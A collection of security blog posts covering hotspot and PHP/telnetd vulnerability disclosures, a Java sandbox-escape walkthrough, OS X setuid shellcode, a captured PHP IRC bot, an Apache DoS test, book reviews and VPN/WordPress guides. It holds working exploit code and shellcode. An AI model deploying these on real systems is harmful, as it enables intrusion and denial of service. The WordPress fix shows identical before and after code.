T-Mobile 4G Hotspot Multiple Vulnerabilities


Create your own personal hotspot on the go with the T-Mobile 4G Mobile Hotspot—get high-speed Internet on up to five Wi-Fi devices, using a single mobile broadband connection.


  • Reported to T-Mobile and ZTE on 4/14/12.
  • Received notification from T-Mobile on 4/17/12 that the vulnerabilities would be forwarded to their security team for review.
  • Received no meaningful response from ZTE.
  • No fixes provided, disclosure 2/21/13

Device: T-Mobile 4G Mobile Hotspot ZTE MF61

The access point broadcasts as ‘T-Mobile Broadband#’ where # changes per device.

Vulnerability #1: Authentication Bypass

The internal administrative web interface is served up with the GoAhead Embedded Web Server (which probably has to be the most vulnerable web server I’ve ever seen in my life — google it) This particular issue with the web server was already reported a long long time ago (CVE-2002-2427) but I’m reporting it here nonetheless.

Authentication to the administrative interface can be bypassed by adding an extra ‘/’ character after any page. This leads to:

  • Exposure of administrative settings
  • Exposure of WiFi Password

Vulnerability #2: Unauthenticated Text Message Disclosure

You can send and receive text messages using the hotspot (although I don’t know why or who would actually use this functionality). All of the text messages are stored in an XML file with the messages being encoded with UTF-16

The messages are accessible, unauthenticated at http://mobile.hotspot/sms_xml/nv_inbox.xml

That’s all for now. I’m sure there are still several unreported goodies to find.
Please fix these T-Mobile.
Dustin Schultz

My Plea to Oracle: Axe Java Applets

Hi Oracle,

We’ve got a bit of problem: applets.

You see, almost every recent security vulnerability and recent hack – Facebook, Apple, NYT – has been because of your support for applets.

Just to name a few, there’s CVE-2012-3213,CVE-2012-3342,CVE-2013-0351,CVE-2013-0409,CVE-2013-0419,CVE-2013-0423,CVE-2013-0424,CVE-2013-0425,CVE-2013-0426,CVE-2013-0427,CVE-2013-0428,CVE-2013-0429,CVE-2013-0432,CVE-2013-043,CVE-2013-0434,CVE-2013-0435,CVE-2013-0438,CVE-2013-0440,CVE-2013-0441,CVE-2013-0442,CVE-2013-0443,CVE-2013-0445,CVE-2013-0450,CVE-2013-1473,CVE-2013-1475,CVE-2013-1476,CVE-2013-1478,CVE-2013-1480,CVE-2013-1481,CVE-2013-1486,CVE-2013-1487,CVE-2013-1488.

I’ve been developing in Java for many years and I can attest that nobody uses applets anymore. It’s old outdated technology that needs to go away. It’s too heavy of a platform to deliver web applications. The future of web technology is light weight. The future is HTML5, Javascript, and CSS3.

We all make mistakes and nobody is going to blame you (except maybe the malware authors) for getting rid of applets.

Do it! Axe it!

Security Enthusiast and Java Developer
Dustin Schultz

Java Facepalm

It’s been a while since I’ve blogged but I couldn’t resist with the latest Java vulnerability. I saw the proof of concept code posted by jduck last night (here) and thought this looks like normal Java code to me (I develop in Java at my day job). Well it turns out…this is normal Java code!


  • This has been assigned CVE-2012-4681.
  • Post Updated: I originally thought the vulnerability was due to the public nature of SunToolkit’s getField method. While this does help to exploit the vulnerability, it’s not actually the real problem. The problem lies in the Expression class (or it’s parent Statement) as you’re allowed to call Class.forName and load restricted packages.

Breaking It Down

Statement localStatement = 
   new Statement(System.class, "setSecurityManager", new Object[1]);

If you can disable the Java SecurityManager then you can disable any security checks and you have full control to run whatever code you would like on the JVM. If this code happens to be code running from an applet within a browser, you’re in trouble.

This is what the first statement is doing by setting the securityManager to null. But hold on, you can’t just call setSecurityManager without proper privileges. It’s not that easy!

What we need to do is we need to set the context within which setSecurityManager runs to be AllPermission.

Permissions localPermissions = new Permissions();
localPermissions.add(new AllPermission());
ProtectionDomain localProtectionDomain = 
   new ProtectionDomain(new CodeSource(
   new URL("file:///"), new Certificate[0]), localPermissions);
AccessControlContext localAccessControlContext = 
   new AccessControlContext(new ProtectionDomain[] {

The above code is preparing a full privileges context so we can disable the SecurityManger. Now, how are we going to set this context within the Statement object?

A beautiful disaster

SunToolkit provides a public method which happily executes a privileged operation and returns a reference to a a Field object. It also calls setAccessible(true) on the field which means it disables any ‘final’ or ‘private’ directives.

Since SunToolkit is part of sun.awt.* and packaged in rt.jar (Java Runtime Classes) it is able to execute this privileged method for us (all system code has full privileges).

We can use this to set the ‘acc’ (an AccessControlContext object) field within the Statement class to our full privileges object.

SetField(Statement.class, "acc", localStatement, localAccessControlContext);

The details of setField are were we see SunToolkit being abused

Object arrayOfObject[] = new Object[2];
arrayOfObject[0] = paramClass;
arrayOfObject[1] = paramString;
Expression localExpression = 
   new Expression(GetClass("sun.awt.SunToolkit"), "getField", arrayOfObject);
((Field)localExpression.getValue()).set(paramObject1, paramObject2);

Line 4, 5, and 7 are important. Line 4 and 5 get a reference to sun.awt.SunToolkit. Normally you wouldn’t be able to do this. You’d get

access denied("java.lang.RuntimePermission" "accessClassInPackage.sun.awt")

But for some reason (still not clear to me), in Java 7 update 6, executing Class.forName as an Expression object gives you the correct privileges to get access to this class. The reason that Expression can can call Class.forName is that Java Security only checks the immediate caller (Statement) which in this case is privileged.

// Succeeds
Expression localExpression = 
   new Expression(Class.class, "forName", arrayOfObject);

Line 7 is the actual call to set the AllPermissions context. Now that we’ve setup the statement to execute with full privileges, all we need to do is execute it.

//recall localStatement.execute() = setSecurityManager(null)

SecurityManager disabled (a null SecurityManager is a disabled SecurityManager).

50 Byte x86_64 OS X setuid execve Null Free Shellcode

More smaller shellcode, this time, tested and verified working on OSX 10.7.


 * Name: setuid_shell_x86_64
 * Qualities: Null-Free
 * Platforms: Mac OS X 10.7 Intel x86_64
 *  Created on: Apr 12, 2012
 *      Author: Dustin Schultz - TheXploit.com
char shellcode[] =


; File: setuid_shell_x86_64.asm
; Author: Dustin Schultz - TheXploit.com

section .text
global start

mov r8b, 0x02                   ; Unix class system calls = 2
shl r8, 24                      ; shift left 24 to the upper order bits
or r8, 0x17                     ; setuid = 23, or with class = 0x2000017
xor edi, edi                    ; zero out edi, uid = 0
mov rax, r8                     ; syscall number in rax
; mov rax, 0x2000017
syscall                         ; invoke kernel
add r8, 0x24                    ; 0x24+r8=0x200003b
mov rax, r8                     ; syscall number in rax
xor rdx, rdx                    ; zero out rdx, null terminator
; mov rax, 0x200003b
mov rdi, 0x68732f2f6e69622f     ; /bin//sh in hex
push rdx                        ; push backwards, null terminator
push rdi                        ; address of /bin//sh
mov rdi, rsp                    ; null terminated /bin/sh pointer
push rdx                        ; push backwards, null terminator
push rdi                        ; address of /bin//sh
mov rsi, rsp                    ; null terminated /bin/sh pointer
syscall                         ; invoke kernel

To test:

dustin@sholtz:~/$ nasm -f macho64 shell.s 
dustin@sholtz:~/$ ld -static -arch x86_64 shell.o
dustin@sholtz:~/$ ./a.out

Bytes from otool:

dustin@sholtz:~/$ otool -t a.out 
(__TEXT,__text) section
0000000100000f86 41 b0 02 49 c1 e0 18 49 83 c8 17 31 ff 4c 89 c0 
0000000100000f96 0f 05 49 83 c0 24 4c 89 c0 48 31 d2 48 bf 2f 62 
0000000100000fa6 69 6e 2f 2f 73 68 52 57 48 89 e7 52 57 48 89 e6 
0000000100000fb6 0f 05 


Execve Syscall on OSX 10.7

I’m getting some strange behavior with shellcode that used to work on OS X 10.6. I noticed that if I don’t link with the “-static” option, I get a segfault.

; File: shell.s
; Author: Dustin Schultz - TheXploit.com

section .text
global start

xor rdx, rdx
mov eax, 0x200003b
mov rdi, 0x68732f2f6e69622f
push rsi
push rdi
mov rdi, rsp

With static:

dustin@sholtz:~$ nasm -f macho64 shell.s 
dustin@sholtz:~$ ld -static -arch x86_64 shell.o
dustin@sholtz:~$ ./a.out 
dustin@sholtz:/Users/dustin$ exit

Without static

dustin@sholtz:~$ nasm -f macho64 shell.s 
dustin@sholtz:~$ ld -arch x86_64 shell.o
dustin@sholtz:~$ ./a.out 
Segmentation fault: 11

otool has the same output:

dustin@sholtz:~$ otool -tv static 
(__TEXT,__text) section
0000000100000fe7	xorq	%rdx,%rdx
0000000100000fea	movl	$0x0200003b,%eax
0000000100000fef	movq	$0x68732f2f6e69622f,%rdi
0000000100000ff9	pushq	%rsi
0000000100000ffa	pushq	%rdi
0000000100000ffb	movq	%rsp,%rdi
0000000100000ffe	syscall
dustin@sholtz:~$ otool -tv non-static 
(__TEXT,__text) section
0000000100000f9f	xorq	%rdx,%rdx
0000000100000fa2	movl	$0x0200003b,%eax
0000000100000fa7	movq	$0x68732f2f6e69622f,%rdi
0000000100000fb1	pushq	%rsi
0000000100000fb2	pushq	%rdi
0000000100000fb3	movq	%rsp,%rdi
0000000100000fb6	syscall

The headers on the files look way different but I’m not sure exactly what is causing the issue. For instance, the non-static version has several more Load commands like LC_LOAD_DYLINKER (which is expected).

As pointed out in the comments, I was not initializing rsi correctly! Thanks for pointing that out. The fix was to add this before the last syscall:

push rdx
push rdi
mov rsi, rsp

Finding the syscall implementations in OS X

This is mainly just a little note for myself. Sometimes when I’m writing shellcode, I’m interested in how OS X implements the syscalls internally. It’s easy to find out with a command like this:

dustin@sholtz:~$ otool -tv /usr/lib/system/libsystem_kernel.dylib | grep -A10 execve
0000000000016898	movl	$0x0200017c,%eax
000000000001689d	movq	%rcx,%r10
00000000000168a0	syscall
00000000000168a2	jae	0x000168a9
00000000000168a4	jmp	0x00017ffc
00000000000168a9	ret
00000000000168aa	nop
00000000000168ab	nop
00000000000168ac	movl	$0x02000184,%eax
00000000000173e0	movl	$0x0200003b,%eax
00000000000173e5	movq	%rcx,%r10
00000000000173e8	syscall
00000000000173ea	jae	0x000173f1
00000000000173ec	jmp	0x00017ffc
00000000000173f1	ret
00000000000173f2	nop
00000000000173f3	nop
00000000000173f4	movl	$0x0200000d,%eax

This will find the execve syscall implementation. I still haven’t figured out where the parameters are getting setup but this is definitely where the syscall number is getting moved into rax. It moves whatever was in rcx because it gets smashed by the kernel when syscall is invoked.

Book Review: Practical Malware Analysis

I’ve been dying to get this review out for a while now. There’s so much good and deep content in this book, that reading it on nights after work and weekends took longer than expected! I’ll tell you now that if you’re into computers and computer security, this book won’t let you down.This book is like having your very own personal malware analysis teacher without the expensive training costs.

About the Book

The book material is exhaustingly complete with 21 chapters + appendices covering everything from static analysis, environment setup, x86 assembly to anti-disassembly and anti-virtual machine practices. Total book content, minus lab solutions comes in at an enormous 475 pages (with lab solutions, 732 pages) . Let’s just say that you better be prepared to eat, breathe, and live malware analysis for quite some time. The skill level for the book is targeted at someone with experience in programming and security although an ambitious beginner should do fine.

My Review & Recommendation

The authors, Michael Sikorski and Andrew Honig, do a great job of teaching the concepts and not just the tools. They want you to develop the skills necessary to think on your own as a malware analyst so that when new techniques come out that aren’t in the book, you’ll have the mental tools to figure out the challenges. Don’t worry though, this book isn’t filled with boring theory like those books you read back in school, the concepts taught have actual practical uses.

Better yet, the book gives you the opportunity to apply the concepts with labs at the end of each chapter. You’ll actually be dissecting “real malware” written by the authors for the purposes of this book. Equally as awesome is that each lab comes with a “quick solution” and a “detailed solution.” I learn best when I can fight through a tough problem and check with the solution when I’m stuck.

The book is entirely centered around Windows based malware, particularly malware written for Windows XP. This was a good learning experience for me because I’m not familiar with the internal Windows APIs and features. It’d actually be very interesting if the authors included a section on Linux-based and/or Mac-based malware.

On that note, I did actually try to run some of the lab malware on Windows 7 32 and 64 bit thinking that it would be no big deal but I received an APPCRASH error every time. I spoke with one of the authors over email and he was very helpful. He said that the malware was designed for Windows XP for teaching purposes that will be revealed when reading the book. With this slight limitation comes some positive: it leaves room for a 2nd edition of the book focused on the newer Vista/7 features as malware becomes more prominent on these machines.

Book content aside, the physical paperback book itself is a pleasant surprise. NoStarch Press is one of my favorite publishers because they use the “lay-flat” type binding (they also published one of my other favorite books: Hacking the Art of Exploitation). You’ll be praising this when you want to set the book down and copy some code. The book does also come in digital formats. I used a combination of both for the review.

You won’t be an expert in malware analysis when you’re done with this book but it sure as hell will give you the information you need to get there. This book is broad, covering a ton of topics. Each Chapter could have likely been a book in and of itself. As I’ve said in a previous post, this book will become the de facto standard for learning about malware analysis.

Thanks to No Starch Press for the review copy, this book is awesome!

Half way through Practical Malware Analysis

I’m about half way through Practical Malware Analysis and let me just say … this book is awesome! Quote me on this: I guarantee this book will go down in history as one of the best in its class. Look out for my full review!

Book Review: Hacking and Securing iOS Applications

About the Book

Hacking and Securing iOS Applications is a recently released book by Jonathan Zdziarski. This book is aimed to teach you how to

  • Compromise an iOS device
  • Steal the filesystem of an iOS device
  • Abuse the Objective-C runtime
  • Defeat iOS built in encryption
  • Protect your own applications

and much, much, more! The book comes in at just shy of 400 pages. Each chapter is broken into a specific topic and builds on previous chapters. However, there are a few chapters which are self contained and could be read without prior knowledge (e.g. Chapter 13 – Jailbreak Detection).

Audience, Skill Level, & Prereqs

This book is targeted at app developers and the how-does-ios-work-and-how-can-I-manipulate-it type person (I try not to use the term “Hacker”). Jonathan also uses the term tinkers – I like that one too!

The book mentions that a solid foundation in Objective-C is necessary, however, personally I think that knowledge of the syntax and some basic Foundation Kit API usage is sufficient. An understanding of standard C, some assembly language, using a debugger, and a comfortable ability to use a shell is needed. A very thin knowledge of Operating Systems is needed to know what syscalls are but you should be able to Google that.

What did I think about the book?

Well, let’s start with the cover: a weasel (definition: weasel – a sneaky and cunning person). Let’s just say it’s definitely a fitting title. It made me laugh.

Past the cover, you’re in for a real good time. I had an absolute blast reading this book. What I liked most about the book is that it got down to the knitty-gritty details really fast. By the end of Chapter 2, you’ve already jailbroken your device and wrote a custom C program to steal your address book. Come Chapter 3, you’ve stolen the whole file system of your device.

With the exception of a few very obvious typos, the book is clear and concise and walks you step-by-step through each exercise. In addition to the numerous hands-on exercises, there’s a wealth of knowledge scattered throughout this book. I personally learned a lot about the internals of iOS. First, the numerous caches in iOS are really working against application security. Let’s just say they leak like a sieve. Another interesting weakness is due to the HFS journal filesystem. Journaling file systems kind of work like version control. They keep a previous copy of the file and the edits made on it. Because of this, deleting an encrypted file’s encryption key is not enough to remove a file (the default when a file is deleted) since old copies in the journal will retain the key.

If I had one criticism for the book, I’d say that overall the material in securing applications is somewhat lacking. The book really focuses on hacking. There are 9 chapters on hacking and 5 chapters on securing. Realistically though, learning to hack is an important part of learning to secure. I just would have liked to have seen more concrete securing exercises.

Final Thoughts

If you’re curious with tinkering around with the internals of iOS or if you’re an application developer looking to secure your application, you’ll definitely find this book useful. All in all, I highly recommend this book to any developer or security professional.

Thanks to Regina Wilkinson at O’Reilly for the review copy!

Critical PHP Remote Vulnerability Introduced in Fix for PHP Hashtable Collision DOS

One Security Fix Introduces Another

Today, Stefan Esser (@i0n1c) reported a critical remotely exploitable vulnerability in PHP 5.3.9 (update assigned CVE-2012-0830). The funny thing is that this vulnerability was introduced in the fix for the hash collision DOS (CVE-2011-4885) reported in December.

The Vulnerable Fix

The fix to prevent hash collisions introduces a new configuration property in php.ini called


This configuration element limits the number of variables that can be used in a request (e.g. http://request.com/foo.php?a=1&b=2&c=3). The default is set to 1000.

The changes were made to php_variables.c in the function php_register_variable_ex.

PHP starts off by “registering” all variables in a request through this function

if (sapi_module.input_filter(PARSE_POST, var, &val, val_len, &new_val_len TSRMLS_CC)) {
	php_register_variable_safe(var, val, new_val_len, array_ptr TSRMLS_CC);

Which in turn calls the vulnerable function

PHPAPI void php_register_variable_ex(char *var_name, zval *val, zval *track_vars_array TSRMLS_DC)

...tons of code removed...

if (is_array) {

... code removed ...

		if (zend_hash_num_elements(symtable1) <= PG(max_input_vars)) {
			if (zend_hash_num_elements(symtable1) == PG(max_input_vars)) {
				php_error_docref(NULL TSRMLS_CC, E_WARNING, "Input variables exceeded %ld. To increase the limit change max_input_vars in php.ini.", PG(max_input_vars));
			zend_symtable_update(symtable1, escaped_index, index_len + 1, &gpc_element, sizeof(zval *), (void **) &gpc_element_p);
        ... some code removed...
        symtable1 = Z_ARRVAL_PP(gpc_element_p);
... tons more code removed ...


The vulnerability happens when the number of variables exceeds max_input_vars and the variable is an array variable (if (*p == ‘[‘)). Instead of an else case which would stop and return, the code is allowed to continue executing. The code continues to execute up to line 207, the second highlighted line. At line 207, it is calling a macro Z_ARRVAL_PP to get a reference to the updated hashtable. This is where the code execution can occur.

If we look a little further down, gpc_element is eventually assigned the value of the variable.

 	gpc_element->value = val->value;

When the code reaches the point where the number of variables is greater than max input, gpc_element_p will point to the previous variable value. Z_ARRVAL_PP will expect the value to be a ZVAL struct with a hashtable (usually initialized by array_init(…)) but that memory hasn’t been initialized in the case were the previous value was a non-array (plain) variable.

The Ironic Part

The most ironic thing about all of this is that because this fix was for a security vulnerability, it was backported and applied more likely than a regular bug fix or update.

Update 1: PoC

A very nice PoC by Paul Westin

Update 2: Fixed Released

PHP 5.3.10 released – UPDATE NOW!

A Textbook Buffer Overflow: A Look at the FreeBSD telnetd Code

Wow, I feel real sorry for the FreeBSD guys having to announce a remotely exploitable vulnerability in their Telnet Daemon on Christmas Eve! Let’s just hope that nobody uses Telnet anymore.

The Classic, Oh So Classic, Overflow

The buffer overflow occurs in encrypt.c and really is your textbook example of a buffer overflow. The interesting part is that this code hasn’t been touched in over 3 years! As Colin Percival pointed out in the comments, this bug has been in telnetd for over 20 years!

telnetd.c & state.c

It all starts in telnetd.c which receives input from the network and passes it to state.c which is a little “state machine” that directs the input to the proper method call by pulling a character from the data received and walking through a huge case statement.

In the case of encryption negotiation, the case TELOPT_ENCRYPT is reached and eventually the subcase ENCRYPT_ENC_KEYID is reached. ‘subpointer’ is data supplied by the client minus the 2 bytes used for control flow of the state machine. encrypt_enc_keyid passes the ‘subpointer’ data directly to the encrypt_keyid function

	encrypt_enc_keyid(subpointer, SB_LEN());

encrypt.c defines a key_info struct with a fixed length buffer of 64 bytes to hold the key id passed by the client.

#define	MAXKEYLEN 64

static struct key_info {
    unsigned char keyid[MAXKEYLEN];
    int keylen;
    int dir;
    int *modep;
    Encryptions *(*getcrypt)();
} ki[2] = {
    { { 0 }, 0, DIR_ENCRYPT, &encrypt_mode, findencryption },
    { { 0 }, 0, DIR_DECRYPT, &decrypt_mode, finddecryption },

However, the encrypt_keyid method happily copies the passed data into the key_info struct using memcpy without any restriction on the length specified by MAXKEYLEN

static void
encrypt_keyid(struct key_info *kp, unsigned char *keyid, int len)
    } else if ((len != kp->keylen) || (memcmp(keyid,kp->keyid,len) != 0)) {
	 * Length or contents are different
	kp->keylen = len;
	memcpy(kp->keyid,keyid, len);
	if (ep->keyid)
	    (void)(*ep->keyid)(dir, kp->keyid, &kp->keylen);

It’s a bit surprising that this code has been around for 3 years 20 years without anyone noticing. You’d think that a simple buffer overflow like this could easily be spotted with automated tools. The sad thing too is that Mac OS X is also remotely exploitable according to their posted source.

VPNs: Setting up your own IPSEC VPN

This is the second part of a two part article about setting up your own VPN services. In the first article I talked about how to set up an SSL-based VPN server. While SSL-based VPNs are very useful and require no inherit support from the OS, they’re only as good as the supported clients. If there isn’t a client for your device, you’re out of luck.

Think Linux, Mac, Windows, iOS, Android, Blackberry

This is where an IPSEC VPN is useful. There is built in native support on almost all operating systems including iPad, iPhone, Blackberry, Android, Linux, Mac, and Windows.

Why setup your own VPN?

Well quite frankly I’m a little biased since I love computer security and might be a little paranoid. But to be honest it’s amazing how much having your own VPN can come in handy. No more worries about open WI-FI networks (think coffee shop), filtering of content, or using work’s VPN for personal business. Don’t pay for a VPN service, it’s really not hard to set up your own for free.

Before you begin

As mentioned in the previous article. These instructions are based off an installation to Ubuntu Linux. However, it really is very easy to port these instructions to another distribution of Linux; I promise! If you want help, leave a comment.

One last thing before we dive in. This isn’t exactly “command line kung fu” (sed & awk) but if you’re uncomfortable using the command line, quit now. After all, I assume that if you know what an IPSEC VPN is and you’re reading this to set up your own IPSEC server, you know how to use the command line. You didn’t expect it to be point-and-click did you?

FYI, I have personally tested the following setup and configuration as working flawlessly on: iPad, iPod Touch, Ubuntu Linux, Mac OS X, Windows XP, and Windows 7.

Installing the software

You can start by installing the packaged version of OpenSwan using your package installer (apt-get, yum, rpm, dpkg, etc) but I’d highly recommend, instead, you download the latest release and compile it yourself. The latest version will have the most up-to-date security fixes that may not have made it to the packages yet.

Building from source can be a nightmare if you run into dependency hell so it’s easiest to have the package manager install all of the build dependencies.

nobody@nobody:~/$ sudo apt-get install build-dep openswan

Next, visit the download page for OpenSwan and note the latest release number. At this time, the latest release is 2.6.37. Make sure you replace below with the latest version.

nobody@nobody:~/$ export OS_REL=2.6.37
nobody@nobody:~/$ wget 
> http://www.openswan.org/download/openswan-${OS_REL}.tar.gz

Since OpenSwan now uses the Linux kernel’s native IPSEC stack (added in 2.6 and back ported to 2.4), installation is much simpler than it used to be. Just extract, build, and install.

nobody@nobody:~/$ tar xvvzf openswan-${OS_REL}.tar.gz
nobody@nobody:~/$ cd openswan-${OS_REL}
nobody@nobody:~/$ make programs
nobody@nobody:~/$ sudo make install

IPSEC is a point-to-point communication between the VPN client and the VPN server so we need to install the Point-to-Point Protocol (PPP).

nobody@nobody:~/$ sudo apt-get install ppp dnsmasq

Since we’ll be sending PPP frames over the Internet, we need a way to tunnel them over Internet Protocol (IP). The Layer 2 Tunneling Protocol (L2TP) does just this: tunnels PPP frames (and other types of frames) over IP. Essentially, L2TP creates a UDP packet with an L2TP header that wraps the PPP frame. It’s also worth nothing that L2TP is used just as a means of transferring. IPSEC will provide the confidentiality, authentication, and integrity to the packet. Let’s install it.

nobody@nobody:~/$ sudo apt-get install xl2tpd

We’re now finished with the install part. Next up, we need to configure all of the settings. Be prepared, it’s a lot of configuration!

We’ll set up our VPN to use a Pre-Shared Key (PSK) since it’s the easiest to configure on devices and is still sufficiently secure as long as good practices are used to generate the key (long and random).

Configuring IPSEC

First up, we need to configure the actual IPSEC settings of OpenSwan. You do that by editing


. You’ll see terms like ‘right’ and ‘left’. This is referring to which end of the VPN connection. In our case, ‘left’ is the VPN server and ‘right’ is the client connecting.

version 2.0

# basic configuration
config setup
	# Enable this if you're behind a router
	# exclude networks used on server side so they don't conflict with your NAT
	# which IPsec stack to use. netkey is Linux Kernel Impl


conn L2TP-PSK-noNAT
	# we cannot rekey for %any, let client rekey
	# Set ikelifetime and keylife to same defaults windows has
	# l2tp-over-ipsec is transport mode
	# For updated Windows 2000/XP clients,
	# to support old clients as well, use leftprotoport=17/%any
	# The remote user.

and creating a pre-shared key in

# This file holds shared secrets or RSA private keys for inter-Pluto
# authentication.  See ipsec_pluto(8) manpage, and HTML documentation.
Configuring L2TP

Next up for configuration is L2TP. You can do that by adding the following to the bottom of

ipsec saref = yes

[lns default]
# The range of ips to assign the client when connecting
ip range =
local ip =
# We're going to us Chap-v2
refuse chap = yes
refuse pap = yes
require authentication = yes
ppp debug = yes
pppoptfile = /etc/ppp/options.xl2tpd
length bit = yes
Configuring PPP

You’ll notice we referenced an options.xl2tpd file in the previous configuration file. Let’s set that up by editing



asyncmap 0
name l2tpd
lcp-echo-interval 30
lcp-echo-failure 4

Now we need to setup the username and password to authenticate with in /etc/ppp/chap-secrets. This is different than the pre-shared key that you setup previously. Do not make the passwords the same. Note that the ‘server’ parameter needs to match the ‘name’ parameter in the previous configuration file.

# Secrets for authentication using CHAP
# client        server  secret                  IP addresses
username 	l2tpd   strong_pass	        *
Configuring the firewall and system start-up

We’re still not done with configuration, hang in there, this is the last one!

We need to configure iptables to properly forward our packets as well as enable ip forwarding in the Linux kernel, among other Linux kernel settings that are related to the IP stack. If you don’t configure these, OpenSwan will complain and may not work properly. Edit


and add the following

iptables -A FORWARD -m state --state RELATED,ESTABLISHED -j ACCEPT
iptables -A FORWARD -s -j ACCEPT
iptables -A FORWARD -s -j ACCEPT
iptables -A FORWARD -j REJECT
iptables -t nat -A POSTROUTING -s -o eth0 -j MASQUERADE
iptables -t nat -A POSTROUTING -s -o eth0 -j MASQUERADE
echo 1 > /proc/sys/net/ipv4/ip_forward
for each in /proc/sys/net/ipv4/conf/*
    echo 0 > $each/accept_redirects
    echo 0 > $each/send_redirects
/etc/init.d/ipsec restart

exit 0
Last steps

At this point, you’ll need to either restart your server or execute /etc/rc.local if you’d prefer not to restart.

Congratulations, you now have a working IPSEC VPN. If you’re familiar with how to setup a client on your operating system, you should be able to fire one up and connect right away. If not, follow one of the many guides that are available online to figure out your specific configuration. Feel free to comment if you need help.


Book Review: The CERT Oracle Secure Coding Standard for Java

About the Book

The CERT Oracle Secure Coding Standard for Java is a huge compilation of best practices for coding bug-free and secure Java applications. The book is broken up into chapters which focus on a specific area of programming or design. Each chapter is then further broken up into individual sections that represent best practices. Each best practice is given a unique identifier along with an example or examples of non-compliant and compliant code. The book weighs in at around 700 pages and can be read front to back or used as a reference for any particular topic.

The Audience/Skill Level

The book covers a broad range of programming topics and should be readable by anyone with basic knowledge of Java and security.

Initial Impression

I work as a lead software engineer developing in Java on a day-to-day basis. I’m a big advocate of coding standards and I often promote them to my junior developers as I truly believe they lead to an overall better (and secure) product. When I heard about this book, I was eager to read it as I don’t think security is as heavily focused as it should be in the Java realm. My initial browsing through the book was promising. I really liked how the authors provided a non-compliant and compliant example in every situation. My hopes were set high.

The Book

This book is like Effective Java by Joshua Bloch on steroids. It’s an excellent reference for a number of best practices that people have developed over years and years of using Java. While I enjoyed reading the book and will be keeping it at my desk for a reference, my only plight with it is perhaps the title. My expectations were to read best practices as they pertained to Java and security, however, the book is mainly focused on how to avoid common bugs in Java and Java APIs that could potentially lead to programming errors. Those programming errors in turn may or may not lead to security vulnerabilities and sometimes the authors do not make that clear.

Those criticisms aside, I did find Chapter 6 and Chapter 15 of the book to be of particular interest to security. Chapter 6 is focused on object orientation and Chapter 15 is focused on serialization.

Chapter 6 talks about things like maliciously subclassing code and passing the malicious instance to an implementation to control its execution. The book heavily advocates defensive copying to prevent such attacks. Another interesting part of Chapter 6 is about finalizer attacks. Using the standard finalize() method in Java, it’s possible to construct an otherwise uncontructable object (e.g. because security constraints weren’t passed) by stealing a reference to it in the finalize() method.

Chapter 15 focuses on several of the attacks that are made possible by serialization. One of the weak points of Java security, in my opinion, is it’s native serialization. Particularly, the book focuses on how serialization can violate program invariants if not programmed properly (e.g. more than one instance of a Singleton). It also touches on a very important deserialization attack (CVE-2008-5353) where deserializing objects in a doPrivileged block can result in arbitrary code execution.

In summary, I would recommend this book to any Java professional as a basis for a coding standard for their project but security enthusiasts might find the material lacking.

I would like to thank Fred Long for providing me the copy of this book to review. Thanks a lot Fred – it was fun.

Found a PHP IRC Bot in the Wild

Strange Requests

I was grepping through my access logs the other day and noticed several requests like the following


Strange Text File

I decided to take a look at what j1.txt was and discovered that it was a (nicely commented) PHP script that would join an IRC channel and accept commands. The script looks like it was originally coded in English and was later modified by some Indonesians.

I’m not sure exactly what vulnerability is being exploited here but it’s likely a local file inclusion type vulnerability where j1.txt (the PHP code) would end up on the server and could be executed by visiting a certain URL or embedded in the current page at the current URL.

Full Disclosure: The Bot Source

In light of full disclosure I’m posting the bot here for your enjoyment. You’ll notice that the bot isn’t very sophisticated and basically just allows for basic IRC commands and proxying like features like sending messages as the bot.

Here’s some short teaser snippets

Snippet 1:

function hajar() {

$channels = '#teamhack #jombang'; // Pisahkan dengan spasi

$localtest = 0; //1, Coba di localhost. 0, connect ke server irc
$showrespone = 0; //1, Nampilin respon dari server irc

Snippet 2:

//Server IRC
if ($localtest == 1) { $remotehost2 = array("localhost"); }
else {
$remotehost2 = array(
$port = "6667";
$awaymsg = '4[[6TeamHacK 8LaBoRaToRiuMz12]]';

You can find the full source code here.

Apache Killer vs TheXploit.com

For those of you that haven’t heard (you must live under a rock), there is currently an unpatched DoS attack against all Apache Web servers that can easily be executed from a single computer. A Perl script was posted to the Full Disclosure mailing list last weekend.

I run Apache 2.2 on TheXploit.com so I thought it’d be an interesting experiment to see what happens. So, here we go: Apache Killer vs. TheXploit

Executing The Attack: Impressive

I fired up a Linux box and ran

perl apachekiller.pl thexploit.com 50
host seems vuln
ATTACKING thexploit.com [using 50 forks]

Less than a minute had gone by and TheXploit.com was completely unreachable. Requests to the site simply said Connecting… but the page never loaded.

Apache Killer Wins: What happened?

The Apache Killer script requests several overlapping ranges of bytes of (the same) data in a single request (approximately 1300). Each range of bytes is turned into a fetch of data which is kept in memory.

The second parameter to Apache Killer is the number of Range requests to make – in our case 50. This means that we effectively made 50 * 1300 = 65000 requests – all of which consumed a piece of memory.

That means memory on the server started filling up very quickly. So quickly, that OS page swapping started kicking in. Check out the massive spike in disk io

Next came the email alert

Your Linode has exceeded the notification threshold (1000) for disk io rate by averaging 1631.06 for the last 2 hours.

At this point, the only thing I could do to return to normal operations was restart the server.


Update Aug 30 – Apache 2.2.20 released to fix this
Until Apache releases an update, the attack is pretty easily avoidable with a simple workaround.

In /etc/apache2/httpd.conf

# drop Range header when more than 5 ranges.
# CVE-2011-3192
SetEnvIf Range (,.*?){5,} bad-range=1
RequestHeader unset Range env=bad-range

Alternatively, if you’re using CloudFlare on your blog – you’re already protected.

So how did your server fair? Did it last longer than a minute?

Configure a Working SSL Subdomain on WordPress While Still Using CloudFlare

CloudFlare and Securing WordPress Admin

I’ve recently been using CloudFlare on this blog for performance, security, and bandwidth and spam comment reduction. I also recently made the switch to Linode so I now have full control of my server. I wanted to secure my WordPress admin login page but since I use the free version of CloudFlare, I had to put SSL on a subdomain.

Secured Subdomain with Mangled Webpages

Once I had setup the secure subdomain, I noticed that none of the pages loaded correctly; just text. I later figured out that the reason is because WordPress 3.0 rewrites all urls to https when viewed under https. That meant that it was trying to request https URLs for things like CSS, images, etc from CloudFlare and not the subdomain. I tried all types of mod_rewrite combinations to no avail.

The Solution

The solution is really simple. All you need to do is install the WordPress HTTPS Plugin and configure the following settings:

  • SSL Host: secure.yoursite.com
  • Check Force SSL Administration

With the recent update of the plugin to version 2.0, you need to actually edit the plugin because it does not rewrite the wp-login.php page.

Change this:

// Fix admin_url on login page
if ( $GLOBALS['pagenow'] == 'wp-login.php' && $this->is_ssl() ) {
	add_filter('site_url', array(&$this, 'replace_http_url'));

To this:

// Fix admin_url on login page
if ( $GLOBALS['pagenow'] == 'wp-login.php' && $this->is_ssl() ) {
	add_filter('site_url', array(&$this, 'replace_http_url'));
